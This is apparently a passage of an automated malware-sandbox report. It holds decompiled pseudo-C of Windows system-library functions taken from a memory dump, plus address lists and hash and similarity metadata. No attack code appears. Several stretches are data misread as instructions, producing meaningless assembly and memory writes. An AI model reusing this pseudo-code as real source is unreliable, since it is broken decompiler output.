								__eflags = _a8;
								_t331 = _t331 + (( *_t317 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t282 = E019239F2(_t331);
									_t317 = _v32;
									_t331 = _t282;
								}
							}
							_t301 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t337 = _v68;
								__eflags = 0;
								 *((short*)(_t331 - 2)) = 0;
								goto L32;
							} else {
								_t292 = _t336 + _t290 * 4;
								_v56 = _t292;
								do {
									__eflags = _t317;
									if(_t317 != 0) {
										_t249 =  *(_v60 + _t301 * 4);
										__eflags = _t249;
										if(_t249 == 0) {
											goto L30;
										} else {
											__eflags = _t249 == 5;
											if(_t249 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t292 =  *(_v60 + _t301 * 4);
										 *(_t292 + 0x18) = _t331;
										_t253 =  *(_v60 + _t301 * 4);
										__eflags = _t253 - 8;
										if(_t253 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t253 * 4 +  &M018C2959))) {
												case 0:
													__ax =  *0x1988488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E018DF3E0(__edi,  *0x198848c, __ax & 0x0000ffff);
														__eax =  *0x1988488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E018DF3E0(_t331, _v80, _v64);
													_t277 = _v64;
													goto L26;
												case 2:
													 *0x1988480 & 0x0000ffff = E018DF3E0(__edi,  *0x1988484,  *0x1988480 & 0x0000ffff);
													__eax =  *0x1988480 & 0x0000ffff;
													__eax = ( *0x1988480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E018DF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E018DF3E0(_t331, _v76, _v36);
														_t277 = _v36;
													}
													L26:
													_t346 = _t346 + 0xc;
													_t331 = _t331 + (_t277 >> 1) * 2 + 2;
													__eflags = _t331;
													L27:
													_push(0x3b);
													_pop(_t279);
													 *((short*)(_t331 - 2)) = _t279;
													goto L28;
												case 6:
													__ebx =  *0x198575c;
													__eflags = __ebx - 0x198575c;
													if(__ebx != 0x198575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E018DF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x198575c;
														} while (__ebx != 0x198575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1988478 & 0x0000ffff = E018DF3E0(__edi,  *0x198847c,  *0x1988478 & 0x0000ffff);
													__eax =  *0x1988478 & 0x0000ffff;
													__eax = ( *0x1988478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E019239F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1986e58 & 0x0000ffff = E018DF3E0(__edi,  *0x1986e5c,  *0x1986e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1986e58 & 0x0000ffff;
													__eax = ( *0x1986e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t301 = _v16;
													_t317 = _v32;
													L29:
													_t292 = _t292 + 4;
													__eflags = _t292;
													_v56 = _t292;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t301 = _t301 + 1;
									_v16 = _t301;
									__eflags = _t301 - _v48;
								} while (_t301 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t253 =  *(_v60 + _t329 * 4);
						if(_t253 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t253 * 4 +  &M018C2935))) {
							case 0:
								__ax =  *0x1988488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t317 =  &_v64;
								_v80 = E018C2E3E(0,  &_v64);
								_t288 = _t288 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1988480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1988480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E018AEEF0(0x19879a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E018AEB70(__ecx, 0x19879a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t227 = _v72;
											__eflags = _t227;
											if(_t227 != 0) {
												L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t227);
											}
											_t228 = _v52;
											__eflags = _t228;
											if(_t228 != 0) {
												__eflags = _t337;
												if(_t337 < 0) {
													L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t228);
													_t228 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t297 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1987b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L018B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E018AEB70(__ecx, 0x19879a0);
										__eax = _v52;
										L36:
										_pop(_t330);
										_pop(_t338);
										__eflags = _v8 ^ _t342;
										_pop(_t289);
										return E018DB640(_t228, _t289, _v8 ^ _t342, _t317, _t330, _t338);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t284 = _v56;
								if(_v56 != 0) {
									_t317 =  &_v36;
									_t286 = E018C2E3E(_t284,  &_v36);
									_t297 = _v36;
									_v76 = _t286;
								}
								if(_t297 == 0) {
									goto L44;
								} else {
									_t288 = _t288 + 2 + _t297;
								}
								goto L14;
							case 6:
								__eax =  *0x1985764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1988478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1988478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1986e58 & 0x0000ffff;
								__eax = ( *0x1986e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t329 = _t329 + 1;
								if(_t329 >= _v48) {
									goto L16;
								} else {
									_t317 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t302 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t302 = es;
					asm("o16 sub [ecx+eax+0x18c27e0], cl");
					 *[es:ecx] = es;
					_t339 = _t336 + 1;
					 *((intOrPtr*)(_t302 + _t253 + 0x18c2605)) =  *((intOrPtr*)(_t302 + _t253 + 0x18c2605)) - _t302;
					_pop(ds);
					_pop(_t293);
					 *((intOrPtr*)(_t253 +  &_a1530200456)) =  *((intOrPtr*)(_t253 +  &_a1530200456)) + _t317;
					 *_t317 =  *_t317 + _t253;
					 *((intOrPtr*)(_t302 + _t253 + 0x18c2880)) =  *((intOrPtr*)(_t302 + _t253 + 0x18c2880)) - _t302;
					_t254 = _t253 *  *_t331;
					 *_t302 = es;
					_push(ds);
					 *((intOrPtr*)(_t302 + _t254 + 0x18c284e)) =  *((intOrPtr*)(_t302 + _t254 + 0x18c284e)) - _t302;
					asm("daa");
					 *_t302 = es;
					asm("fcomp dword [ebx-0x70]");
					 *((intOrPtr*)(_t254 +  &_a1546912136)) =  *((intOrPtr*)(_t254 +  &_a1546912136)) + _t336 + 1;
					_t348 = _t346 + _t302;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x196ff00);
					E018ED08C(_t293, _t331, _t339);
					_v44 =  *[fs:0x18];
					_t332 = 0;
					 *_a24 = 0;
					_t294 = _a12;
					__eflags = _t294;
					if(_t294 == 0) {
						_t257 = 0xc0000100;
					} else {
						_v8 = 0;
						_t340 = 0xc0000100;
						_v52 = 0xc0000100;
						_t259 = 4;
						while(1) {
							_v40 = _t259;
							__eflags = _t259;
							if(_t259 == 0) {
								break;
							}
							_t307 = _t259 * 0xc;
							_v48 = _t307;
							__eflags = _t294 -  *((intOrPtr*)(_t307 + 0x1871664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t274 = E018DE5C0(_a8,  *((intOrPtr*)(_t307 + 0x1871668)), _t294);
									_t348 = _t348 + 0xc;
									__eflags = _t274;
									if(__eflags == 0) {
										_t340 = E019151BE(_t294,  *((intOrPtr*)(_v48 + 0x187166c)), _a16, _t332, _t340, __eflags, _a20, _a24);
										_v52 = _t340;
										break;
									} else {
										_t259 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t259 = _t259 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t340;
						__eflags = _t340;
						if(_t340 < 0) {
							__eflags = _t340 - 0xc0000100;
							if(_t340 == 0xc0000100) {
								_t303 = _a4;
								__eflags = _t303;
								if(_t303 != 0) {
									_v36 = _t303;
									__eflags =  *_t303 - _t332;
									if( *_t303 == _t332) {
										_t340 = 0xc0000100;
										goto L76;
									} else {
										_t320 =  *((intOrPtr*)(_v44 + 0x30));
										_t261 =  *((intOrPtr*)(_t320 + 0x10));
										__eflags =  *((intOrPtr*)(_t261 + 0x48)) - _t303;
										if( *((intOrPtr*)(_t261 + 0x48)) == _t303) {
											__eflags =  *(_t320 + 0x1c);
											if( *(_t320 + 0x1c) == 0) {
												L106:
												_t340 = E018C2AE4( &_v36, _a8, _t294, _a16, _a20, _a24);
												_v32 = _t340;
												__eflags = _t340 - 0xc0000100;
												if(_t340 != 0xc0000100) {
													goto L69;
												} else {
													_t332 = 1;
													_t303 = _v36;
													goto L75;
												}
											} else {
												_t264 = E018A6600( *(_t320 + 0x1c));
												__eflags = _t264;
												if(_t264 != 0) {
													goto L106;
												} else {
													_t303 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t340 = E018C2C50(_t303, _a8, _t294, _a16, _a20, _a24, _t332);
											L76:
											_v32 = _t340;
											goto L69;
										}
									}
									goto L108;
								} else {
									E018AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t340 = _a24;
									_t271 = E018C2AE4( &_v36, _a8, _t294, _a16, _a20, _t340);
									_v32 = _t271;
									__eflags = _t271 - 0xc0000100;
									if(_t271 == 0xc0000100) {
										_v32 = E018C2C50(_v36, _a8, _t294, _a16, _a20, _t340, 1);
									}
									_v8 = _t332;
									E018C2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t257 = _t340;
					}
					L70:
					return E018ED0D1(_t257);
				}
				L108:
			}




















































                0x018c2584
                0x018c2586
                0x018c2590
                0x018c2596
                0x018c2597
                0x018c2598
                0x018c2599
                0x018c259e
                0x018c25a4
                0x018c25a9
                0x018c25ac
                0x018c25ae
                0x018c25b1
                0x018c25b2
                0x018c25b5
                0x018c25b8
                0x018c25bb
                0x018c25bc
                0x018c25bf
                0x018c25c2
                0x018c25c5
                0x018c25c6
                0x018c25cb
                0x018c25ce
                0x018c25d8
                0x018c25dd
                0x018c25de
                0x018c25e1
                0x018c25e3
                0x018c25e9
                0x018c26da
                0x018c26da
                0x018c26dd
                0x018c26e2
                0x01905b56
                0x00000000
                0x018c26e8
                0x018c26f9
                0x018c26fb
                0x018c26fe
                0x018c2700
                0x01905b60
                0x00000000
                0x018c2706
                0x018c2706
                0x018c270a
                0x018c270a
                0x018c270d
                0x018c2713
                0x018c2716
                0x018c2718
                0x018c271c
                0x018c271e
                0x01905b6c
                0x01905b6f
                0x01905b7f
                0x01905b89
                0x01905b8e
                0x01905b93
                0x01905b96
                0x01905b9c
                0x01905ba0
                0x01905ba3
                0x01905bab
                0x01905bb0
                0x01905bb3
                0x01905bb3
                0x01905ba3
                0x018c2724
                0x018c2726
                0x018c2729
                0x018c272c
                0x018c279d
                0x018c279d
                0x018c27a0
                0x018c27a2
                0x00000000
                0x018c272e
                0x018c272e
                0x018c2731
                0x018c2734
                0x018c2734
                0x018c2736
                0x01905bc1
                0x01905bc1
                0x01905bc4
                0x00000000
                0x01905bca
                0x01905bca
                0x01905bcd
                0x00000000
                0x01905bd3
                0x00000000
                0x01905bd3
                0x01905bcd
                0x018c273c
                0x018c273c
                0x018c2742
                0x018c2747
                0x018c274a
                0x018c274d
                0x018c2750
                0x00000000
                0x018c2756
                0x018c2756
                0x00000000
                0x018c2902
                0x018c2908
                0x018c290b
                0x00000000
                0x018c2911
                0x018c291c
                0x018c2921
                0x00000000
                0x018c2921
                0x00000000
                0x00000000
                0x018c2880
                0x018c2887
                0x018c288c
                0x00000000
                0x00000000
                0x018c2805
                0x018c280a
                0x018c2814
                0x018c2816
                0x00000000
                0x00000000
                0x018c281e
                0x018c2821
                0x018c2823
                0x00000000
                0x018c2829
                0x018c2829
                0x018c2831
                0x018c283c
                0x018c283e
                0x00000000
                0x018c283e
                0x00000000
                0x00000000
                0x018c284e
                0x018c2850
                0x018c2851
                0x018c2854
                0x018c2857
                0x018c285a
                0x018c285c
                0x018c285d
                0x00000000
                0x00000000
                0x018c275d
                0x018c2761
                0x00000000
                0x018c2767
                0x018c276e
                0x018c2773
                0x018c2773
                0x018c2776
                0x018c2778
                0x018c277e
                0x018c277e
                0x018c2781
                0x018c2781
                0x018c2783
                0x018c2784
                0x00000000
                0x00000000
                0x01905bd8
                0x01905bde
                0x01905be4
                0x01905be6
                0x01905be8
                0x01905be9
                0x01905bee
                0x01905bf8
                0x01905bff
                0x01905c01
                0x01905c04
                0x01905c07
                0x01905c0b
                0x01905c0d
                0x01905c0d
                0x01905c15
                0x01905c18
                0x01905c1b
                0x01905c1b
                0x01905c1e
                0x00000000
                0x00000000
                0x018c28c3
                0x018c28c8
                0x018c28d2
                0x018c28d4
                0x018c28d8
                0x018c28db
                0x01905c26
                0x01905c28
                0x01905c2d
                0x01905c2d
                0x00000000
                0x00000000
                0x01905c34
                0x01905c36
                0x01905c49
                0x01905c4e
                0x01905c54
                0x01905c5b
                0x01905c5d
                0x01905c60
                0x018c2788
                0x018c2788
                0x018c278b
                0x018c278e
                0x018c278e
                0x018c278e
                0x018c2791
                0x00000000
                0x00000000
                0x018c2756
                0x018c2750
                0x00000000
                0x018c2794
                0x018c2794
                0x018c2795
                0x018c2798
                0x018c2798
                0x00000000
                0x018c2734
                0x018c272c
                0x018c2700
                0x018c25ef
                0x018c25ef
                0x018c25ef
                0x018c25f2
                0x018c25f8
                0x00000000
                0x00000000
                0x018c25fe
                0x00000000
                0x018c28e6
                0x018c28ec
                0x018c28ef
                0x018c28f5
                0x018c28f8
                0x018c28f8
                0x00000000
                0x018c28f8
                0x00000000
                0x00000000
                0x018c2866
                0x018c2866
                0x018c2876
                0x018c2879
                0x00000000
                0x00000000
                0x018c27e0
                0x018c27e7
                0x018c27e9
                0x018c27eb
                0x01905afd
                0x00000000
                0x01905afd
                0x00000000
                0x00000000
                0x018c2633
                0x018c2638
                0x018c263b
                0x018c263c
                0x018c263e
                0x018c2640
                0x018c2642
                0x018c2647
                0x018c2649
                0x018c264e
                0x018c2650
                0x018c2653
                0x018c2659
                0x018c26a2
                0x018c26a7
                0x018c26ac
                0x018c26b2
                0x01905b11
                0x01905b15
                0x01905b17
                0x00000000
                0x018c26b8
                0x018c26b8
                0x018c26ba
                0x018c27a6
                0x018c27a6
                0x018c27a9
                0x018c27ab
                0x018c27b9
                0x018c27b9
                0x018c27be
                0x018c27c1
                0x018c27c3
                0x018c27c5
                0x018c27c7
                0x01905c74
                0x01905c79
                0x01905c79
                0x018c27c7
                0x00000000
                0x018c26c0
                0x018c26c0
                0x018c26c3
                0x018c26c6
                0x018c26c6
                0x018c26c9
                0x018c26c9
                0x00000000
                0x018c26c9
                0x018c26ba
                0x018c265b
                0x018c265b
                0x018c265e
                0x018c2667
                0x018c266d
                0x018c2677
                0x018c267c
                0x018c267f
                0x018c2681
                0x01905b49
                0x01905b4e
                0x018c27cd
                0x018c27d0
                0x018c27d1
                0x018c27d2
                0x018c27d4
                0x018c27dd
                0x018c2687
                0x018c2687
                0x018c268a
                0x018c268b
                0x018c268e
                0x018c268f
                0x018c2691
                0x018c2696
                0x018c2698
                0x018c269d
                0x018c269f
                0x00000000
                0x018c269f
                0x018c2681
                0x00000000
                0x00000000
                0x018c2846
                0x00000000
                0x00000000
                0x018c2605
                0x018c260a
                0x018c260c
                0x018c2611
                0x018c2616
                0x018c2619
                0x018c2619
                0x018c261e
                0x00000000
                0x018c2624
                0x018c2627
                0x018c2627
                0x00000000
                0x00000000
                0x01905b1f
                0x00000000
                0x00000000
                0x018c2894
                0x018c289b
                0x018c289d
                0x018c28a1
                0x01905b2b
                0x01905b2e
                0x01905b2e
                0x018c28a7
                0x018c28a9
                0x01905b04
                0x01905b09
                0x01905b09
                0x01905b09
                0x00000000
                0x00000000
                0x01905b35
                0x01905b3c
                0x018c28fb
                0x018c28fb
                0x018c26cc
                0x018c26cc
                0x018c26d0
                0x00000000
                0x018c26d2
                0x018c26d2
                0x00000000
                0x018c26d2
                0x00000000
                0x00000000
                0x018c25fe
                0x018c292d
                0x018c292f
                0x018c2930
                0x018c2935
                0x018c2937
                0x018c2939
                0x018c2941
                0x018c2945
                0x018c2946
                0x018c294d
                0x018c294e
                0x018c2950
                0x018c2958
                0x018c295a
                0x018c2961
                0x018c2963
                0x018c2965
                0x018c2966
                0x018c296e
                0x018c296f
                0x018c2971
                0x018c2974
                0x018c297c
                0x018c297e
                0x018c297f
                0x018c2980
                0x018c2981
                0x018c2982
                0x018c2983
                0x018c2984
                0x018c2985
                0x018c2986
                0x018c2987
                0x018c2988
                0x018c2989
                0x018c298a
                0x018c298b
                0x018c298c
                0x018c298d
                0x018c298e
                0x018c298f
                0x018c2990
                0x018c2992
                0x018c2997
                0x018c29a3
                0x018c29a6
                0x018c29ab
                0x018c29ad
                0x018c29b0
                0x018c29b2
                0x01905c80
                0x018c29b8
                0x018c29b8
                0x018c29bb
                0x018c29c0
                0x018c29c5
                0x018c29c6
                0x018c29c6
                0x018c29c9
                0x018c29cb
                0x00000000
                0x00000000
                0x018c29cd
                0x018c29d0
                0x018c29d9
                0x018c29db
                0x018c29dd
                0x018c2a7f
                0x018c2a84
                0x018c2a87
                0x018c2a89
                0x01905ca1
                0x01905ca3
                0x00000000
                0x018c2a8f
                0x018c2a8f
                0x00000000
                0x018c2a8f
                0x00000000
                0x018c29e3
                0x018c29e3
                0x018c29e3
                0x00000000
                0x018c29e3
                0x018c29dd
                0x00000000
                0x018c29db
                0x018c29e6
                0x018c29e9
                0x018c29eb
                0x018c29ed
                0x018c29f3
                0x018c29f5
                0x018c29f8
                0x018c29fa
                0x018c2a97
                0x018c2a9a
                0x018c2a9d
                0x018c2add
                0x00000000
                0x018c2a9f
                0x018c2aa2
                0x018c2aa5
                0x018c2aa8
                0x018c2aab
                0x01905cab
                0x01905caf
                0x01905cc5
                0x01905cda
                0x01905cdc
                0x01905cdf
                0x01905ce5
                0x00000000
                0x01905ceb
                0x01905ced
                0x01905cee
                0x00000000
                0x01905cee
                0x01905cb1
                0x01905cb4
                0x01905cb9
                0x01905cbb
                0x00000000
                0x01905cbd
                0x01905cbd
                0x00000000
                0x01905cbd
                0x01905cbb
                0x018c2ab1
                0x018c2ab1
                0x018c2ac4
                0x018c2ac6
                0x018c2ac6
                0x00000000
                0x018c2ac6
                0x018c2aab
                0x00000000
                0x018c2a00
                0x018c2a09
                0x018c2a0e
                0x018c2a21
                0x018c2a24
                0x018c2a35
                0x018c2a3a
                0x018c2a3d
                0x018c2a42
                0x018c2a59
                0x018c2a59
                0x018c2a5c
                0x018c2a5f
                0x018c2a5f
                0x018c29fa
                0x018c29f3
                0x018c2a64
                0x018c2a64
                0x018c2a6b
                0x018c2a6b
                0x018c2a6d
                0x018c2a72
                0x018c2a72
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: PATH
                • API String ID: 0-1036084923
                • Opcode ID: 57d213d8d2a16fc1dfcfb0b6d36458b240dddac756dacdbc30a2c0b3192b4125
                • Instruction ID: 0cde5366ca1c58314600aa25a42a2a22481bf368ef8d6ccec709f9fb47ff9775
                • Opcode Fuzzy Hash: 57d213d8d2a16fc1dfcfb0b6d36458b240dddac756dacdbc30a2c0b3192b4125
                • Instruction Fuzzy Hash: 9AC17D75D00219DBDB25DFACD880AADBBB6FF48B44F49402DE505EB290D734EA42CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018CFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E018CFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E018AEEF0(0x1987b60);
					_t134 =  *0x1987b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1987b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1987b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E018A6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E018A76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01938938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0189B150();
													}
													_t116 = E01936D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E018A75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1988638; // 0x0
																	_t122 = L018A38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E018A76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E018A76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L018CFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L018A70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E018CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E018CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
